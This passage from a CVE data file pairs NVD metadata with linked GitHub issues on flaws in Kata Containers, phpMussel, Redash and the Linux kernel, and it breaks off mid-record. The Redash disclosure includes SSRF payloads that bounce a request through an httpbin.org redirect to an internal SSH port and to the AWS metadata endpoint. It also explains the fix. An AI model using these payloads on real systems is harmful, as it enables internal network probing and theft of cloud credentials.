https://api.github.com/repos/kata-containers/runtime/issues/2488/comments
0
2020-02-20T16:13:48Z
2020-05-29T15:38:09Z
https://github.com/kata-containers/runtime/issues/2488
568,410,720
2,488
1,270
CVE-2020-2026
2020-06-10T18:15:11.360
A malicious guest compromised before a container creation (e.g. a malicious guest image or a guest running multiple containers) can trick the kata runtime into mounting the untrusted container filesystem on any host path, potentially allowing for code execution on the host. This issue affects: Kata Containers 1.11 versions earlier than 1.11.1; Kata Containers 1.10 versions earlier than 1.10.5; Kata Containers 1.9 and earlier versions.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.1, "impactScore": 6, "source": "psirt@paloaltonetworks.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2, "impactScore": 6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "psirt@paloaltonetworks.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/kata-containers/runtime/issues/2712" }, { "source": "psirt@paloaltonetworks.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/kata-containers/runtime/pull/2713" }, { "source": "psirt@paloaltonetworks.com", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/kata-containers/runtime/releases/tag/1.10.5" }, { "source": "psirt@paloaltonetworks.com", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/kata-containers/runtime/releases/tag/1.11.1" }, { "source": "psirt@paloaltonetworks.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2P7FHA4AF6Y6PAVJBTTQPUEHXZQUOF3P/" }, { "source": "psirt@paloaltonetworks.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6JPBKAQBF3OR72N55GWM2TDYQP2OHK6H/" }, { "source": "psirt@paloaltonetworks.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6W5MKF7HSAIL2AX2BX6RV4WWVGUIKVLS/" }, { "source": "psirt@paloaltonetworks.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NJAMOVB7DSOGX7J26QH5HZKU7GSSX2VU/" }, { "source": "psirt@paloaltonetworks.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QNJHSSPCKUGJDVXXIXK2JUWCRJDQX7CE/" }, { "source": "psirt@paloaltonetworks.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XWACJQSMY5BVDMVTF3FBN7HZSOSFOG3Q/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/kata-containers/runtime/issues/2712" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/kata-containers/runtime/pull/2713" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/kata-containers/runtime/releases/tag/1.10.5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/kata-containers/runtime/releases/tag/1.11.1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2P7FHA4AF6Y6PAVJBTTQPUEHXZQUOF3P/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6JPBKAQBF3OR72N55GWM2TDYQP2OHK6H/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6W5MKF7HSAIL2AX2BX6RV4WWVGUIKVLS/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NJAMOVB7DSOGX7J26QH5HZKU7GSSX2VU/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QNJHSSPCKUGJDVXXIXK2JUWCRJDQX7CE/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XWACJQSMY5BVDMVTF3FBN7HZSOSFOG3Q/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:katacontainers:runtime:*:*:*:*:*:*:*:*", "matchCriteriaId": "0AB886E3-03F3-43FA-AE4F-092FA6246A31", "versionEndExcluding": null, "versionEndIncluding": "1.9", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:katacontainers:runtime:*:*:*:*:*:*:*:*", "matchCriteriaId": "FD1E8DE9-C5B6-4DA0-A5B2-A6C3B38DD2B6", "versionEndExcluding": "1.10.5", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.10", "vulnerable": true }, { "criteria": "cpe:2.3:a:katacontainers:runtime:*:*:*:*:*:*:*:*", "matchCriteriaId": "1358CC70-876F-4CA6-AC86-551883794212", "versionEndExcluding": "1.11.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.11", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*", "matchCriteriaId": "80F0FA5D-8D3B-4C0E-81E2-87998286AF33", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "59" ]
59
https://github.com/kata-containers/runtime/issues/2712
[ "Third Party Advisory" ]
github.com
[ "kata-containers", "runtime" ]
We need to make sure containers cannot modify host path unless it is explicitly shared to it. Right now we expose an additional top level shared directory to the guest and allow it to be modified. This is less ideal and can be enhanced by following method: 1. create two directories for each sandbox: -. /run/kata-containers/shared/sandboxes/$sbx_id/mounts/, a directory to hold all host/guest shared mounts -. /run/kata-containers/shared/sandboxes/$sbx_id/shared/, a host/guest shared directory (9pfs/virtiofs source dir) 2. /run/kata-containers/shared/sandboxes/$sbx_id/mounts/ is bind mounted readonly to /run/kata-containers/shared/sandboxes/$sbx_id/shared/, so guest cannot modify it 3. host-guest shared files/directories are mounted one-level under /run/kata-containers/shared/sandboxes/$sbx_id/mounts/ and thus present to guest at one level under /run/kata-containers/shared/sandboxes/$sbx_id/shared/
host shared directory should be readonly
https://api.github.com/repos/kata-containers/runtime/issues/2712/comments
0
2020-05-29T15:40:02Z
2020-06-03T02:18:21Z
https://github.com/kata-containers/runtime/issues/2712
627,358,605
2,712
1,271
CVE-2020-4043
2020-06-10T20:15:14.483
phpMussel from versions 1.0.0 and less than 1.6.0 has an unserialization vulnerability in PHP's phar wrapper. Uploading a specially crafted file to an affected version allows arbitrary code execution (discovered, tested, and confirmed by myself), so the risk factor should be regarded as very high. Newer phpMussel versions don't use PHP's phar wrapper, and are therefore unaffected. This has been fixed in version 1.6.0.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.7, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.1, "impactScore": 4, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Patch", "Release Notes", "Third Party Advisory" ], "url": "https://github.com/phpMussel/phpMussel/commit/97f25973433921c1f953430f32d3081adc4851a4" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/phpMussel/phpMussel/issues/167" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/phpMussel/phpMussel/pull/173" }, { "source": "security-advisories@github.com", "tags": [ "Mitigation", "Third Party Advisory" ], "url": "https://github.com/phpMussel/phpMussel/security/advisories/GHSA-qr95-4mq5-r3fh" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/phpMussel/phpMussel/security/policy#currently-known-vulnerabilities" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Release Notes", "Third Party Advisory" ], "url": "https://github.com/phpMussel/phpMussel/commit/97f25973433921c1f953430f32d3081adc4851a4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/phpMussel/phpMussel/issues/167" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/phpMussel/phpMussel/pull/173" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mitigation", "Third Party Advisory" ], "url": "https://github.com/phpMussel/phpMussel/security/advisories/GHSA-qr95-4mq5-r3fh" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/phpMussel/phpMussel/security/policy#currently-known-vulnerabilities" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:phpmussel_project:phpmussel:*:*:*:*:*:*:*:*", "matchCriteriaId": "2EC9BA66-3EEA-45DA-9609-227B31D00DE5", "versionEndExcluding": "1.6.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.0.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "502" ]
502
https://github.com/phpMussel/phpMussel/issues/167
[ "Patch", "Third Party Advisory" ]
github.com
[ "phpMussel", "phpMussel" ]
An unserialization vulnerability was recently discovered which affects the phar wrapper. Due to that phpMussel implements the phar wrapper for reading archives, this vulnerability also currently affects all currently supported versions of phpMussel to the extent of its ability to read archives. I would __*strongly*__ recommend that all phpMussel users __*disable archive checking*__ in phpMussel until further notice. This can be achieved by setting `check_archives` to `false` in the phpMussel configuration (at which point, phpMussel would be unable to scan the content of archives, but would also be protected from this vulnerability). Currently planning exactly how to resolve this problem for phpMussel, but it'll most likely involve a complete overhaul of how phpMussel handles archives, and involve completely ditching the phar wrapper in favour of something else. Anyway, I'll reply here with any relevant updates that happen, new information, etc, and announce here when the problem is resolved.
Phar unserialization vulnerability.
https://api.github.com/repos/phpMussel/phpMussel/issues/167/comments
3
2018-08-23T19:12:13Z
2024-05-10T03:17:40Z
https://github.com/phpMussel/phpMussel/issues/167
353,515,512
167
1,272
CVE-2020-12725
2020-06-11T19:15:10.000
Havoc Research discovered an authenticated Server-Side Request Forgery (SSRF) via the "JSON" data source of Redash open-source 8.0.0 and prior. Possibly, other connectors are affected. The SSRF is potent and provides a lot of flexibility in terms of being able to craft HTTP requests e.g., by adding headers, selecting any HTTP verb, etc.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://blog.redash.io" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Vendor Advisory" ], "url": "https://github.com/getredash/redash/commits/master" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Vendor Advisory" ], "url": "https://github.com/getredash/redash/issues/4869" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://blog.redash.io" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Vendor Advisory" ], "url": "https://github.com/getredash/redash/commits/master" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Vendor Advisory" ], "url": "https://github.com/getredash/redash/issues/4869" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redash:redash:*:*:*:*:*:*:*:*", "matchCriteriaId": "E2E6EF81-37F5-42AC-A33F-3A8A7D1971C4", "versionEndExcluding": null, "versionEndIncluding": "8.0.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "918" ]
918
https://github.com/getredash/redash/issues/4869
[ "Exploit", "Vendor Advisory" ]
github.com
[ "getredash", "redash" ]
# Summary Havoc Research discovered an authenticated Server-Side Request Forgery (SSRF) via the "JSON" data source of Redash open-source version. Possibly, other connectors are affected however the JSON data source provides a lot of flexibility in terms of being able to craft HTTP requests eg., by adding headers, selecting any HTTP verb, etc., making it a very handy tool for pivoting or persistence within internal networks. The final impact depends on the specifics of backend systems in use. To read more about this vulnerability class and its impact, please refer to https://portswigger.net/web-security/ssrf # Steps to reproduce the issue 1. Log in to your Redash instance. Our version under test was 8.0.0+b32245 (a16f551e) (by way of pulling the redash/redash Docker image). 2. Add a new data source of "JSON" type. Skip other fields. 3. Create a new query backed by this data source you have just added. 4. In the query editor use this: ``` url: https://httpbin.org/redirect-to?url=http://172.17.0.1:22&status_code=302 ``` Then execute the statement. Depending on how you deployed Redash you could see something like: ``` Error running query: ('Connection aborted.', BadStatusLine('SSH-2.0-OpenSSH_7.6\r\n')) ``` The httpbin.org service simply sends the `Location` header with the contents of the `url` parameter. 172.17.0.1 is the Docker container our Redash instance is running on and port 22 is assigned to the OpenSSH daemon on that box. Naturally, the address and port will vary depending on attackers' needs. For example, to retrieve the AWS meta-data, the payload could look like: ``` url: https://httpbin.org/redirect-to?url=http://169.254.169.254/latest/meta-data/&status_code=302 ``` # Remediation and root causes It appears that there is a check that attempts to determine whether the address passed in, is a private address and then fails if so: https://github.com/getredash/redash/blob/9790b0731d78f1ab35dad73dd9a3642d574cb469/redash/query_runner/json_ds.py#L38 This check can easily be bypassed by using HTTP redirects. To fix the issue, Redash can prevent its HTTP client from following redirects. This would not mitigate DNS-rebinding when using plain text connections, however. Other known approaches to fix the issue: a) to forward network calls via an outbound proxy, or b) allow connections only to specific addresses (or address ranges) through an ACL. # Notes The proposed CVSSv3 score is 9.1 (Critical) worst-case scenario (https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H&version=3.1) however the actual impact will depend on the environment the application is used in, typical to this vulnerability class. Exploitation requires a) authentication b) available “JSON” data source. This SSRF can be very potent because this particular data source also allows setting custom headers, body and query parameters, method, etc. Other data sources present the same vulnerability however the actual impact may vary depending on the amount of information returned back to the user. Some data sources are more verbose than others. Mark Art 🌪️ Havoc Research team
CVE-2020-12725 - Authenticated Server-Side Request Forgery (SSRF) in the JSON data source / internal addresses restriction bypass
https://api.github.com/repos/getredash/redash/issues/4869/comments
4
2020-05-07T10:53:13Z
2020-06-15T10:25:00Z
https://github.com/getredash/redash/issues/4869
613,961,475
4,869
1,273
CVE-2020-10732
2020-06-12T14:15:11.277
A flaw was found in the Linux kernel's implementation of Userspace core dumps. This flaw allows an attacker with a local account to crash a trivial program and exfiltrate private kernel data.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 3.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 3.3, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 1.4, "source": "secalert@redhat.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "LOW", "baseScore": 4.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 2.5, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-06/msg00022.html" }, { "source": "secalert@redhat.com", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00008.html" }, { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-10732" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Vendor Advisory" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/next/linux-next.git/commit/?id=aca969cacf07f41070d788ce2b8ca71f09d5207d" }, { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/google/kmsan/issues/76" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ruscur/linux/commit/a95cdec9fa0c08e6eeb410d461c03af8fd1fef0a" }, { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://lore.kernel.org/lkml/CAG_fn=VZZ7yUxtOGzuTLkr7wmfXWtKK9BHHYawj=rt9XWnCYvg%40mail.gmail.com/" }, { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20210129-0005/" }, { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://twitter.com/grsecurity/status/1252558055629299712" }, { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4411-1/" }, { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4427-1/" }, { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4439-1/" }, { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4440-1/" }, { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4485-1/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-06/msg00022.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00008.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-10732" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Vendor Advisory" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/next/linux-next.git/commit/?id=aca969cacf07f41070d788ce2b8ca71f09d5207d" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/google/kmsan/issues/76" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ruscur/linux/commit/a95cdec9fa0c08e6eeb410d461c03af8fd1fef0a" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://lore.kernel.org/lkml/CAG_fn=VZZ7yUxtOGzuTLkr7wmfXWtKK9BHHYawj=rt9XWnCYvg%40mail.gmail.com/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20210129-0005/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://twitter.com/grsecurity/status/1252558055629299712" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4411-1/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4427-1/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4439-1/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4440-1/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4485-1/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "matchCriteriaId": "4F9567FB-F394-443B-9A95-1DA060A9CCA6", "versionEndExcluding": "3.16.85", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "matchCriteriaId": "73253D32-56D4-437F-A88C-25D7A631AA5C", "versionEndExcluding": "4.4.226", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "4.4", "vulnerable": true }, { "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "matchCriteriaId": "C08B096E-3683-410F-8B4F-B4A9C9A1A57E", "versionEndExcluding": "4.9.226", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "4.9", "vulnerable": true }, { "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "matchCriteriaId": "05BF7F52-27D8-4903-8006-5890E8F01ECE", "versionEndExcluding": "4.14.183", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "4.14", "vulnerable": true }, { "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "matchCriteriaId": "8A296354-CF5F-4631-8F36-7C4C8F3452C6", "versionEndExcluding": "4.19.126", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "4.19", "vulnerable": true }, { "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "matchCriteriaId": "381D2366-9899-4AFC-A83A-A2883EE78FA7", "versionEndExcluding": "5.4.44", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "5.4", "vulnerable": true }, { "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "matchCriteriaId": "FA20E67F-6725-42A2-92B6-498AFAC5CD22", "versionEndExcluding": "5.6.16", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "5.6", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.2:*:*:*:*:*:*:*", "matchCriteriaId": "B009C22E-30A4-4288-BCF6-C3E81DEAF45A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*", "matchCriteriaId": "815D70A8-47D3-459C-A32C-9FEACA0659D1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*", "matchCriteriaId": "7A5301BF-1402-4BE0-A0F8-69FBE79BC6D6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:20.04:*:*:*:lts:*:*:*", "matchCriteriaId": "902B8056-9E37-443B-8905-8AA93E2447FB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netapp:active_iq_unified_manager:*:*:*:*:*:vmware_vsphere:*:*", "matchCriteriaId": "0CB28AF5-5AF0-4475-A7B6-12E1795FFDCB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "9.5", "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:hci_management_node:-:*:*:*:*:*:*:*", "matchCriteriaId": "A3C19813-E823-456A-B1CE-EC0684CE1953", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, 